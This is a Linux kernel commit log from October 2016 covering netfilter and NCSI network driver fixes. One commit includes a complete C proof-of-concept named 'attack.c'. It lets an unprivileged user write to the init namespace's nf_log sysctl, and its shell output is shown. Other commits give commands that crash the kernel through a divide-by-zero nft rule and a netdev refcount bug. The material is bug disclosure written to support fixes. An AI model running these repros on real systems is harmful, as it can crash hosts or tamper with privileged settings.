1. 12 10月, 2016 4 次提交
  2. 11 10月, 2016 1 次提交
  3. 08 10月, 2016 4 次提交
  4. 07 10月, 2016 4 次提交
  5. 06 10月, 2016 17 次提交
  6. 04 10月, 2016 10 次提交
    • L
      netfilter: nft_limit: fix divided by zero panic · 2fa46c13
      Liping Zhang 提交于
      After I input the following nftables rule, a panic happened on my system:
        # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second
      
        divide error: 0000 [#1] SMP
        [ ... ]
        RIP: 0010:[<ffffffffa059035e>]  [<ffffffffa059035e>]
        nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit]
        Call Trace:
        [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables]
        [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat]
        [<ffffffff81753767>] ? ipt_do_table+0x327/0x610
        [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
        [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
        [<ffffffff816f4aa2>] nf_iterate+0x62/0x80
        [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0
        [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0
        [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0
        [<ffffffff81703d3c>] ip_local_out+0x1c/0x40
      
      This is because divisor is 64-bit, but we treat it as a 32-bit integer,
      then 0xf00000000 becomes zero, i.e. divisor becomes 0.
      Signed-off-by: NLiping Zhang <liping.zhang@spreadtrum.com>
      Signed-off-by: NPablo Neira Ayuso <pablo@netfilter.org>
      2fa46c13
    • J
      netfilter: fix namespace handling in nf_log_proc_dostring · dbb5918c
      Jann Horn 提交于
      nf_log_proc_dostring() used current's network namespace instead of the one
      corresponding to the sysctl file the write was performed on. Because the
      permission check happens at open time and the nf_log files in namespaces
      are accessible for the namespace owner, this can be abused by an
      unprivileged user to effectively write to the init namespace's nf_log
      sysctls.
      
      Stash the "struct net *" in extra2 - data and extra1 are already used.
      
      Repro code:
      
      #define _GNU_SOURCE
      #include <stdlib.h>
      #include <sched.h>
      #include <err.h>
      #include <sys/mount.h>
      #include <sys/types.h>
      #include <sys/wait.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <string.h>
      #include <stdio.h>
      
      char child_stack[1000000];
      
      uid_t outer_uid;
      gid_t outer_gid;
      int stolen_fd = -1;
      
      void writefile(char *path, char *buf) {
              int fd = open(path, O_WRONLY);
              if (fd == -1)
                      err(1, "unable to open thing");
              if (write(fd, buf, strlen(buf)) != strlen(buf))
                      err(1, "unable to write thing");
              close(fd);
      }
      
      int child_fn(void *p_) {
              if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                        NULL))
                      err(1, "mount");
      
              /* Yes, we need to set the maps for the net sysctls to recognize us
               * as namespace root.
               */
              char buf[1000];
              sprintf(buf, "0 %d 1\n", (int)outer_uid);
              writefile("/proc/1/uid_map", buf);
              writefile("/proc/1/setgroups", "deny");
              sprintf(buf, "0 %d 1\n", (int)outer_gid);
              writefile("/proc/1/gid_map", buf);
      
              stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
              if (stolen_fd == -1)
                      err(1, "open nf_log");
              return 0;
      }
      
      int main(void) {
              outer_uid = getuid();
              outer_gid = getgid();
      
              int child = clone(child_fn, child_stack + sizeof(child_stack),
                                CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                                |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
              if (child == -1)
                      err(1, "clone");
              int status;
              if (wait(&status) != child)
                      err(1, "wait");
              if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                      errx(1, "child exit status bad");
      
              char *data = "NONE";
              if (write(stolen_fd, data, strlen(data)) != strlen(data))
                      err(1, "write");
              return 0;
      }
      
      Repro:
      
      $ gcc -Wall -o attack attack.c -std=gnu99
      $ cat /proc/sys/net/netfilter/nf_log/2
      nf_log_ipv4
      $ ./attack
      $ cat /proc/sys/net/netfilter/nf_log/2
      NONE
      
      Because this looks like an issue with very low severity, I'm sending it to
      the public list directly.
      Signed-off-by: NJann Horn <jann@thejh.net>
      Signed-off-by: NPablo Neira Ayuso <pablo@netfilter.org>
      dbb5918c
    • G
      net/ncsi: Introduce ncsi_stop_dev() · c0cd1ba4
      Gavin Shan 提交于
      This introduces ncsi_stop_dev(), as counterpart to ncsi_start_dev(),
      to stop the NCSI device so that it can be reenabled in future. This
      API should be called when the network device driver is going to
      shutdown the device. There are 3 things done in the function: Stop
      the channel monitoring; Reset channels to inactive state; Report
      NCSI link down.
      Signed-off-by: NGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: NJoel Stanley <joel@jms.id.au>
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      c0cd1ba4
    • G
      net/ncsi: Rework the channel monitoring · 83afdc6a
      Gavin Shan 提交于
      The original NCSI channel monitoring was implemented based on a
      backoff algorithm: the GLS response should be received in the
      specified interval. Otherwise, the channel is regarded as dead
      and failover should be taken if current channel is an active one.
      There are several problems in the implementation: (A) On BCM5718,
      we found when the IID (Instance ID) in the GLS command packet
      changes from 255 to 1, the response corresponding to IID#1 never
      comes in. It means we cannot make the unfair judgement that the
      channel is dead when one response is missed. (B) The code's
      readability should be improved. (C) We should do failover when
      current channel is active one and the channel monitoring should
      be marked as disabled before doing failover.
      
      This reworks the channel monitoring to address all above issues.
      The fields for channel monitoring is put into separate struct
      and the state of channel monitoring is predefined. The channel
      is regarded alive if the network controller responses to one of
      two GLS commands or both of them in 5 seconds.
      Signed-off-by: NGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: NJoel Stanley <joel@jms.id.au>
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      83afdc6a
    • G
      net/ncsi: Allow to extend NCSI request properties · a0509cbe
      Gavin Shan 提交于
      There is only one NCSI request property for now: the response for
      the sent command need drive the workqueue or not. So we had one
      field (@driven) for the purpose. We lost the flexibility to extend
      NCSI request properties.
      
      This replaces @driven with @flags and @req_flags in NCSI request
      and NCSI command argument struct. Each bit of the newly introduced
      field can be used for one property. No functional changes introduced.
      Signed-off-by: NGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: NJoel Stanley <joel@jms.id.au>
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      a0509cbe
    • G
      net/ncsi: Rework request index allocation · a15af54f
      Gavin Shan 提交于
      The NCSI request index (struct ncsi_request::id) is put into instance
      ID (IID) field while sending NCSI command packet. It was designed the
      available IDs are given in round-robin fashion. @ndp->request_id was
      introduced to represent the next available ID, but it has been used
      as number of successively allocated IDs. It breaks the round-robin
      design. Besides, we shouldn't put 0 to NCSI command packet's IID
      field, meaning ID#0 should be reserved according section 6.3.1.1
      in NCSI spec (v1.1.0).
      
      This fixes above two issues. With it applied, the available IDs will
      be assigned in round-robin fashion and ID#0 won't be assigned.
      Signed-off-by: NGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: NJoel Stanley <joel@jms.id.au>
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      a15af54f
    • G
      net/ncsi: Don't probe on the reserved channel ID (0x1f) · 55e02d08
      Gavin Shan 提交于
      We needn't send CIS (Clear Initial State) command to the NCSI
      reserved channel (0x1f) in the enumeration. We shouldn't receive
      a valid response from CIS on NCSI channel 0x1f.
      Signed-off-by: NGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: NJoel Stanley <joel@jms.id.au>
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      55e02d08
    • G
      net/ncsi: Introduce NCSI_RESERVED_CHANNEL · bc7e0f50
      Gavin Shan 提交于
      This defines NCSI_RESERVED_CHANNEL as the reserved NCSI channel
      ID (0x1f). No logical changes introduced.
      Signed-off-by: NGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: NJoel Stanley <joel@jms.id.au>
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      bc7e0f50
    • G
      net/ncsi: Avoid unused-value build warning from ia64-linux-gcc · d8cedaab
      Gavin Shan 提交于
      xchg() is used to set NCSI channel's state in order for consistent
      access to the state. xchg()'s return value should be used. Otherwise,
      one build warning will be raised (with -Wunused-value) as below message
      indicates. It is reported by ia64-linux-gcc (GCC) 4.9.0.
      
       net/ncsi/ncsi-manage.c: In function 'ncsi_channel_monitor':
       arch/ia64/include/uapi/asm/cmpxchg.h:56:2: warning: value computed is \
       not used [-Wunused-value]
        ((__typeof__(*(ptr))) __xchg((unsigned long) (x), (ptr), sizeof(*(ptr))))
         ^
       net/ncsi/ncsi-manage.c:202:3: note: in expansion of macro 'xchg'
        xchg(&nc->state, NCSI_CHANNEL_INACTIVE);
      
      This removes the atomic access to NCSI channel's state avoid the above
      build warning. We have to hold the channel's lock when its state is readed
      or updated. No functional changes introduced.
      Signed-off-by: NGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: NJoel Stanley <joel@jms.id.au>
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      d8cedaab
    • A
      net: Add netdev all_adj_list refcnt propagation to fix panic · 93409033
      Andrew Collins 提交于
      This is a respin of a patch to fix a relatively easily reproducible kernel
      panic related to the all_adj_list handling for netdevs in recent kernels.
      
      The following sequence of commands will reproduce the issue:
      
      ip link add link eth0 name eth0.100 type vlan id 100
      ip link add link eth0 name eth0.200 type vlan id 200
      ip link add name testbr type bridge
      ip link set eth0.100 master testbr
      ip link set eth0.200 master testbr
      ip link add link testbr mac0 type macvlan
      ip link delete dev testbr
      
      This creates an upper/lower tree of (excuse the poor ASCII art):
      
                  /---eth0.100-eth0
      mac0-testbr-
                  \---eth0.200-eth0
      
      When testbr is deleted, the all_adj_lists are walked, and eth0 is deleted twice from
      the mac0 list. Unfortunately, during setup in __netdev_upper_dev_link, only one
      reference to eth0 is added, so this results in a panic.
      
      This change adds reference count propagation so things are handled properly.
      
      Matthias Schiffer reported a similar crash in batman-adv:
      
      https://github.com/freifunk-gluon/gluon/issues/680
      https://www.open-mesh.org/issues/247
      
      which this patch also seems to resolve.
      Signed-off-by: NAndrew Collins <acollins@cradlepoint.com>
      Signed-off-by: NDavid S. Miller <davem@davemloft.net>
      93409033